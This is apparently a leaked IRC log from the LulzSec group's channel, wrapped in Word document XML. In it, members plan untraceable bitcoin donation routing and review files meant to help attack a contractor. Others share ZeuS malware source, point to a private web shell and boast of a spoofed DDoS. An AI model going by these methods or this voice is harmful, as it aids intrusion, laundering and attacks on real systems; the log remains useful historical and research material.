fbi-affiliates?utm_source=twitterfeed&amp;utm_medium=twitter Jun 04 10:17:37 Topiary wow that's hideous Jun 04 10:20:55 joepie91 ya Jun 04 10:20:56 joepie91 it is Jun 04 10:29:15 sabu yo Jun 04 10:37:18 * trollpoll has quit (A TLS packet with unexpected length was received.) Jun 04 10:39:38 * t[2] (t@HA-i2b.rkn.75e5ku.IP) has joined #pure-elite Jun 04 10:43:14 * Topiary has quit (Ping timeout: 121 seconds) Jun 04 10:43:17 * t[2] is now known as Topiary Jun 04 10:43:36 * Topiary has quit (Quit: TANGO OSCAR PAPA INDIA ALPHA ROMEO YANKEE TACTICAL BARREL ROLL) Jun 04 10:43:43 * Topiary (t@HA-i2b.rkn.75e5ku.IP) has joined #pure-elite Jun 04 10:50:05 * Topiary has quit (Quit: sec) Jun 04 10:50:52 * Topiary (t@HA-i2b.rkn.75e5ku.IP) has joined #pure-elite Jun 04 11:08:57 joepie91 Topiary Jun 04 11:08:58 joepie91 you here?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 11:10:50 Topiary yeah Jun 04 11:11:31 joepie91 can you generate a new bitcoin address?\ Jun 04 11:11:34 joepie91 someone wants to donate Jun 04 11:11:39 joepie91 but doesn't want his transaction to show up Jun 04 11:11:42 joepie91 on the "normal" address Jun 04 11:11:43 sabu trueeeee Jun 04 11:11:53 Topiary joepie91: can you take the donation and then forward it to me?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 11:11:56 joepie91 idk if the wallet you use allows multiple addresses Jun 04 11:11:57 joepie91 and yes Jun 04 11:12:03 joepie91 but it will still be sort of traceable Jun 04 11:12:12 joepie91 there's just an extra hop Jun 04 11:12:15 Topiary I don't want to change my one as it's on like 150K viewing pastebins Jun 04 11:12:19 joepie91 nono Jun 04 11:12:21 joepie91 just make an extra one Jun 04 11:12:25 joepie91 just for this transaction Jun 04 11:12:27 Topiary don't think you can do that Jun 04 11:12:28 joepie91 idk if your wallet allows it Jun 04 11:12:35 Topiary hmm nope Jun 04 11:12:39 joepie91 in the normal client you can.. in fact it's recommended to make a new address for every transaction Jun 04 11:12:40 Topiary how much is he donating?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 11:12:40 tflow why not just use the bitcoin client?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 11:12:41 joepie91 well derp Jun 04 11:12:42 joepie91 idk Jun 04 11:13:04 Topiary okay well get him to donate to you, then you send to tflow, then tflow send to the lulzsec address Jun 04 11:13:04 tflow i can make one on the bitcoin client if you want Jun 04 11:13:08 tflow ok Jun 04 11:13:20 tflow but if i send to lulzsec address Jun 04 11:13:26 tflow it will be traced back to him Jun 04 11:13:33 joepie91 don't send to lulzsec address Jun 04 11:13:36 joepie91 keep it apart Jun 04 11:13:54 Topiary okay sure then Jun 04 11:13:58 Topiary whatever he wants Jun 04 11:14:06 Topiary if it's 0.01 I will raeg Jun 04 11:14:36 joepie91 lol Jun 04 11:14:44 joepie91 I don't think it will be 0.01 :P Jun 04 11:14:56 tflow 1F7Y5uktm2DofQfMBLfL6cg2TWDmuTkZKU Jun 04 11:16:12 joepie91 okay Jun 04 11:16:14 joepie91 1 sec Jun 04 11:16:27 joepie91 I will probably leave a delay in sending it Jun 04 11:16:32 joepie91 so that he can send it to the anonnews address Jun 04 11:16:41 joepie91 and 1 or 2 days later I can forward it plus a little bit extra to that address Jun 04 11:16:48 joepie91 so that it looks as if I just wanted to "share the wealth" Jun 04 11:16:49 joepie91 etc etc Jun 04 11:17:09 tflow or why not send directly?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 11:17:21 Topiary if you're gonna wait 1-2 days, might as well send directly to lulzsec Jun 04 11:17:30 joepie91 because he doesn't want to be openly linked with lulzsec Jun 04 11:17:40 tflow but it's a new address Jun 04 11:17:56 joepie91 yes, but that will only work if you keep it completely separate Jun 04 11:18:04 tflow we will Jun 04 11:18:07 Topiary we do that anyway Jun 04 11:18:10 joepie91 so don't forward the btc from your address to the lulzsec address Jun 04 11:18:14 joepie91 don't combine payments Jun 04 11:18:14 joepie91 etc Jun 04 11:18:15 tflow ok Jun 04 11:18:15 Topiary whenever we buy anything, I transfer from the main hash to side-hashes Jun 04 11:18:43 tflow that can still be traced Jun 04 11:18:53 joepie91 goddamn Jun 04 11:18:53 joepie91 1 sec Jun 04 11:21:08 joepie91 mk Jun 04 11:21:11 joepie91 now someone else Jun 04 11:21:17 joepie91 is merging into the conversation Jun 04 11:21:22 joepie91 discouraging him from donating etc etc Jun 04 11:21:24 joepie91 wtf -_- Jun 04 11:21:28 tflow lol Jun 04 11:21:32 tflow where is this happenning?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 11:21:37 tflow happening* Jun 04 11:21:42 joepie91 an irc channel Jun 04 11:22:11 tflow just becareful not to link yourself to lulzsec Jun 04 11:23:19 Topiary tell him to grow some balls and donate to the main hash like everyone else Jun 04 11:23:27 Topiary and then tell him to get a new address on his end Jun 04 11:23:32 Topiary and donate the rest to that one Jun 04 11:24:02 joepie91 no srsly, he can't just directly donate it Jun 04 11:24:13 Topiary why not?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 11:24:15 tflow a good way to seperate bc addresses it to convert it to mt gox, then convert it backto bc Jun 04 11:24:20 joepie91 pm Jun 04 11:34:49 storm ho Jun 04 11:34:51 storm hi Jun 04 11:35:01 * storm gives channel operator status to lol Topiary Jun 04 12:00:51 joepie91 - - jews.irc.lulzco.org Message of the Day - Jun 04 12:00:51 joepie91 - Welcome to irc.encyclopediadramatica.ch Jun 04 12:00:51 joepie91 eh.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:07:32 Topiary joepie91 how is that thing going?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:07:55 joepie91 idk Jun 04 12:07:59 joepie91 haven't gotten a response anymore :/ Jun 04 12:08:07 joepie91 I'll wait for a bit until he responds Jun 04 12:11:29 joepie91 goddamnit Jun 04 12:11:33 joepie91 &gt;read inbox Jun 04 12:11:35 joepie91 &gt;spamspamspamspamspam Jun 04 12:14:37 * neuron (neuron@HA-a12.345.a84vd3.IP) has joined #pure- elite Jun 04 12:14:47 neuron o/ morning everyone Jun 04 12:14:54 lol hi neuron :D Jun 04 12:15:07 neuron whats everyone up to/ Jun 04 12:17:22 neuron whats this irc on twitter?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:19:40 * joepie91 facepalms Jun 04 12:19:41 joepie91 http://www.foxbusiness.com/on- air/stossel/blog/2011/06/02/digital-currency-libertarian-future-0 Jun 04 12:19:44 joepie91 &gt;bitcoin Jun 04 12:19:47 joepie91 &gt;libertarian Jun 04 12:19:56 joepie91 &gt;assigning a political color to everything "different" that occurs Jun 04 12:20:03 joepie91 neuron: it's the ED IRC I believe Jun 04 12:20:38 neuron ED?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:22:13 neuron lol: you there?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:24:18 sabu sex Jun 04 12:24:26 sabu joepie Jun 04 12:24:28 neuron hey Sabu o/ Jun 04 12:24:35 Topiary Account Balance is: 26.100001 BTC (449.44 USD @ 17.22) Jun 04 12:24:38 Topiary FFFFFUUUU someone sent us 0.000001 Jun 04 12:24:41 sabu it was the ed irc, hes changing whole network to lulzco net Jun 04 12:24:45 sabu hahahahhah ytou serious?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:24:51 sabu thats awesome Jun 04 12:24:55 lol xD Jun 04 12:25:05 lol neuron: yeh :D?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:25:06 sabu wait what the FUCK bitcoins are at 17 dollars?????????????????????????</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:25:13 neuron AWW YEAH Jun 04 12:25:14 Topiary yeah we have 450USD LOL Jun 04 12:25:15 Topiary in donations Jun 04 12:25:16 neuron they keep going up Jun 04 12:25:20 sabu topiary are we going to start buying servers?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:25:20 lol yeh they're going up all the time :D Jun 04 12:25:21 sabu and vpns?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:25:25 sabu or are we gonna sit on it Jun 04 12:25:29 neuron i say buy now Jun 04 12:25:35 neuron its gonna go down soon Jun 04 12:25:42 Topiary joepie says it's gonna go up soon Jun 04 12:25:47 Topiary like at least to 20 Jun 04 12:25:50 neuron :E Jun 04 12:25:53 sabu topiary generate me a new donation key so I put on topic of lulzsec chan on lulzco network Jun 04 12:26:05 Topiary let's just use the same one bro Jun 04 12:26:26 sabu im lazy lo Jun 04 12:26:27 * neuron will be in that lulzco channel has BlackBeard Jun 04 12:26:28 sabu which one is it?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:26:30 Topiary sec Jun 04 12:26:33 sabu neuron Jun 04 12:26:38 sabu remember what happened with 2600 Jun 04 12:26:46 neuron I didn't have aproblem in 2600 Jun 04 12:26:47 sabu you got to be on point if I op you Jun 04 12:26:48 Topiary http://lulzsecurity.com/donate/ Jun 04 12:26:52 Topiary just put this in the topic Jun 04 12:26:54 Topiary &lt;3 Jun 04 12:26:57 neuron I will be Jun 04 12:27:04 Topiary Sabu: want me to head over?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:29:52 neuron Sabu: Ill be careful Jun 04 12:31:38 joepie91 it's best to sit on bitcoins as long as possible Jun 04 12:31:39 joepie91 imo Jun 04 12:31:48 joepie91 they are pretty much guaranteed to go further up Jun 04 12:31:51 joepie91 in the future Jun 04 12:31:53 lol untill they hatch! :) Jun 04 12:32:06 joepie91 it's pretty much a deflationary currency, not inflationary Jun 04 12:32:29 joepie91 butbutbut Jun 04 12:32:31 joepie91 gotta go somewhere Jun 04 12:32:33 joepie91 for a sec Jun 04 12:33:04 sabu guys Jun 04 12:33:13 sabu if you head over we have much more ocntrol than on 2600 Jun 04 12:33:18 sabu so use your pseudonyms Jun 04 12:33:29 sabu and lol @ faggotry on here Jun 04 12:33:40 sabu register your nicks and tell me them Jun 04 12:33:49 tflow bottle_of_rum Jun 04 12:33:59 neuron Registeered BlackBeard Jun 04 12:37:14 joepie91 Sabu: isn't it Ryans IRC...?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:39:18 sabu 08:37 &lt;lulzsupport&gt; dude check this :) http://www.megaupload.com/?d=0H302G70 Jun 04 12:39:19 sabu 08:37 &lt;lulzsupport&gt; but do not spread use for your purposes ;) Jun 04 12:39:24 sabu check whats about?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:39:37 neuron mn ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:39:49 sabu 08:38 &lt;lulzsupport&gt; [was to give it to captainjack yesterday but i lost him so i didn't have the time to give him the stuff]:) Jun 04 12:39:52 sabu 08:38 &lt;lulzsupport&gt; nope friend but wanna help ;) Jun 04 12:39:53 sabu on your vm Jun 04 12:39:55 sabu 08:38 &lt;lulzsupport&gt; check and you say me :) Jun 04 12:39:56 sabu download that megaupoad Jun 04 12:39:59 sabu 08:38 &lt;lulzsupport&gt; [the directory issue] its for mantech.com :) Jun 04 12:40:01 sabu neuron Jun 04 12:40:02 neuron Rgr Jun 04 12:40:04 sabu see wtf is in it Jun 04 12:40:42 lol becarefull, if it's pdf's or things like tht Jun 04 12:40:52 lol open it on a virtual machine Jun 04 12:41:00 neuron Yeah Jun 04 12:41:11 lol incase it exploits your pdf viwer or w/e filetype it is Jun 04 12:41:35 sabu yeah Jun 04 12:41:38 sabu neuron be on point Jun 04 12:41:47 sabu make sure your vm is behind vpn etc Jun 04 12:41:50 sabu so your ip isnt exposed Jun 04 12:43:48 lol Dont mention nothing private in PM either Jun 04 12:43:52 lol to no one Jun 04 12:43:56 lol not even our members Jun 04 12:43:56 sabu guys Jun 04 12:43:58 sabu everyone Jun 04 12:44:00 sabu talk here Jun 04 12:44:01 lol just incase PM's are logged Jun 04 12:44:04 sabu yup Jun 04 12:44:08 joepie91 is it Ryans IRC or not?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:44:10 sabu I'm there already established Jun 04 12:44:16 sabu JOEPIE YES IT IS ED IRC NETWORK Jun 04 12:44:21 sabu HE CHANGED IT TO LULZCO NETWORK Jun 04 12:44:24 neuron XD Jun 04 12:44:26 joepie91 ah Jun 04 12:44:27 joepie91 there Jun 04 12:44:29 sabu ok Jun 04 12:44:30 neuron Sabu: im there just waiting for ops Jun 04 12:44:30 joepie91 that was what I was wondering about.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:44:31 joepie91 lol Jun 04 12:44:34 sabu lol Jun 04 12:44:35 sabu ok Jun 04 12:44:38 sabu before I start opping etc Jun 04 12:44:38 * pwnsauce (pwnsauce@HA-l80.7te.pn6gun.IP) has joined #pure- elite Jun 04 12:44:42 sabu make sure you guys are on point Jun 04 12:44:44 neuron o/ pwnsauce Jun 04 12:44:44 lol pwnsauce :D Jun 04 12:44:48 sabu if you get any docs / links in pm Jun 04 12:44:50 sabu paste here Jun 04 12:44:55 sabu we'll anallyze together Jun 04 12:44:58 pwnsauce Yo Jun 04 12:45:00 sabu no answering questions at all Jun 04 12:45:03 pwnsauce whats happening?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:45:05 sabu no drama dont get trolled Jun 04 12:45:06 sabu pwnsauce nothing Jun 04 12:45:07 sabu just bored Jun 04 12:45:08 sabu you?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:45:13 pwnsauce Just got online Jun 04 12:45:16 pwnsauce got some idead Jun 04 12:45:19 pwnsauce *ideas Jun 04 12:45:33 joepie91 if someone feels like trolling Awinee some more, here is an excellent opportunity Jun 04 12:45:34 joepie91 &lt;awinee&gt;asie, I wouldn't wanna hack CP sites. Jun 04 12:45:34 joepie91 &lt;awinee&gt;just ddos them Jun 04 12:45:34 joepie91 &lt;asie&gt;Awinee why not?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:45:34 joepie91 &lt;awinee&gt;hacking them would involve possibly seeing the pictures Jun 04 12:45:52 neuron lol Jun 04 12:46:04 pwnsauce lol Jun 04 12:46:12 sabu HAHA Jun 04 12:46:17 joepie91 you know what they say about extreme denial.. .:D Jun 04 12:46:22 sabu ok who is on here now ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:46:28 sabu the lulzco server Jun 04 12:47:09 neuron o/ Has BlackBeard Jun 04 12:50:32 * trollpoll (rootgratz@HA-s5h.ho4.fu85s5.IP) has joined #pure-elite Jun 04 12:50:59 * tflow_ (bottle_of_@HA-r12.0jd.4c0nch.IP) has joined #pure- elite Jun 04 12:52:25 * tflow has quit (Ping timeout: 121 seconds) Jun 04 12:52:32 * tflow_ is now known as tflow Jun 04 12:55:08 neuron lol: Lets see there is a pdf,ppt,xls..hhaha Jun 04 12:58:17 neuron Sabu.. im not seeing anything really "whoop" in this Jun 04 12:58:26 sabu ok Jun 04 12:58:59 neuron :( im the only opless guy in there *crys* Jun 04 13:03:32 trollpoll ill be back Jun 04 13:03:35 * trollpoll has quit (Quit: Leaving) Jun 04 13:03:45 pwnsauce trollpoll is... THE TERMINATOR!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 13:04:14 neuron Sabu: None of this can help us. This was supposed to be information to help us take down mantech but Jun 04 13:04:17 Topiary neuron, we're trying to hide our numbers and shit, we don't want more people being d0x'd Jun 04 13:04:28 Topiary on the other chan Jun 04 13:04:30 neuron Topiary: Understandable Jun 04 13:04:46 Topiary see the nicks that are OP'd now are assuming fake personas Jun 04 13:04:50 Topiary because we leaked fake dox Jun 04 13:05:02 Topiary we're diverting attention from our real nicks and Anonymous Jun 04 13:06:59 neuron Sabu: that zip contains a useless ad dump, email address *maybe useful*, A random nasa forcasting ppt from 2009, and a DoD biometric ppt Jun 04 13:07:45 sabu ok Jun 04 13:07:49 sabu thanks neuron Jun 04 13:07:51 sabu good work brother Jun 04 13:07:54 sabu fuck i gotta shit so hard Jun 04 13:07:55 sabu brb Jun 04 13:08:18 neuron Thats sexy Jun 04 13:12:27 pwnsauce ZeuS source code for all!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.mediafire.com/?o5v9ezj7lyme85t Jun 04 13:12:32 pwnsauce (sharing) Jun 04 13:13:58 * tflow has quit (A TLS packet with unexpected length was received.) Jun 04 13:15:10 * Topiary has quit (Quit: Leaving) Jun 04 13:16:59 neuron Wow people are really throwing bitcoin to lulzsec XD Jun 04 13:18:28 pwnsauce how many we got?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 13:18:29 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elite Jun 04 13:18:32 sabu guys Jun 04 13:18:35 sabu http://www.youtube.com/watch?v=a23T8rl1sek Jun 04 13:18:36 neuron 26 Jun 04 13:18:39 sabu these guys just contacted me privately Jun 04 13:18:43 pwnsauce aye?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 13:18:52 sabu they disrupt national nazi parties Jun 04 13:18:57 sabu ook at how they fight the ns88 Jun 04 13:19:18 tflow what did they say?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 13:19:55 tflow lolwow Jun 04 13:20:34 sabu dude Jun 04 13:20:38 sabu they straight up fuck them nazis up hahaha Jun 04 13:23:02 neuron lol fuck Jun 04 13:34:53 storm rofl Jun 04 13:38:30 neuron thats pretyt crazy Jun 04 13:38:31 neuron o/ storm Jun 04 13:39:35 pwnsauce storm :D Jun 04 13:40:44 storm yooo Jun 04 13:40:59 storm sup neuron pwnsauce Jun 04 13:41:39 pwnsauce sup :D Jun 04 13:41:43 pwnsauce storm - rootkits?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 13:44:13 neuron brb Jun 04 13:44:14 storm you never got it?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 13:44:19 storm I gave it to neuron Jun 04 13:45:17 storm lmk where you want it uploaded Jun 04 13:45:28 storm I'd prefer a shell with scp though.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 13:45:30 storm :P Jun 04 13:51:32 pwnsauce storm - use whoami.cer33.com/fun/shell.php Jun 04 13:51:37 pwnsauce its the web interface Jun 04 13:51:46 pwnsauce all it good for is uploading/downloading shit Jun 04 13:51:49 sabu https://pastee.org/zj3mm "not done" is the pssword Jun 04 13:51:53 sabu tell me what you guys think Jun 04 13:51:53 pwnsauce ill wget it later :) Jun 04 13:51:56 sabu reviving antisec Jun 04 13:52:17 pwnsauce Savu Jun 04 13:52:20 pwnsauce *Sabu Jun 04 13:52:24 pwnsauce u dun goofed Jun 04 13:52:27 pwnsauce no password needed Jun 04 13:52:28 pwnsauce :/ Jun 04 13:53:25 pwnsauce or maybe im just that 1337 that it didnt ask for one...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 13:54:03 storm lol Jun 04 13:54:05 storm yeah Jun 04 13:54:06 storm no pass Jun 04 13:54:33 storm pwnsauce: i don't haz a vpn to go to such webshells Jun 04 13:54:37 storm :x Jun 04 13:54:48 sabu oh its ok not public dont think Jun 04 13:54:55 sabu storm I can give oyu one fgt Jun 04 13:55:12 pwnsauce storm - thats my priv8 webll she Jun 04 13:55:17 pwnsauce *priv8 shell Jun 04 13:55:18 pwnsauce as in Jun 04 13:55:20 pwnsauce I control it Jun 04 13:55:27 storm oh i see Jun 04 13:58:15 storm rofl Jun 04 13:58:19 storm im dropping an efnet server Jun 04 13:58:21 storm with ease Jun 04 13:58:26 storm fucking funny Jun 04 13:58:32 storm 4 100mbps spoofers Jun 04 13:58:39 storm bitch is getting tore the fuck up Jun 04 13:59:04 pwnsauce hahahahhaaha Jun 04 13:59:17 storm pwnsauce: 1 sec Jun 04 14:00:35 storm k check pm Jun 04 14:18:34 storm who the fk is leon Jun 04 14:19:32 sabu ITS ME Jun 04 14:19:32 sabu DICK Jun 04 14:19:35 storm lol Jun 04 14:19:36 storm op me Jun 04 14:19:37 storm :D Jun 04 14:21:27 sabu what nick?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 14:21:39 storm voodoo ofc Jun 04 14:23:42 storm looks like bots are joining Jun 04 14:24:37 * trollpoll (trollpoll@HA-4pn.f1d.en4ulv.IP) has joined #pure-elite Jun 04 14:25:27 sabu storm Jun 04 14:25:28 neuron back Jun 04 14:25:30 sabu hande dem bots Jun 04 14:25:30 storm yo Jun 04 14:25:32 storm k Jun 04 14:25:34 sabu gave you ops Jun 04 14:26:03 neuron back o/ Jun 04 14:27:02 sabu sup Jun 04 14:27:05 sabu hi trollpol :D Jun 04 14:27:17 trollpoll hi bro Jun 04 14:27:27 trollpoll ill be here but idle..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 14:27:56 neuron Sabu: whats going on latley?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
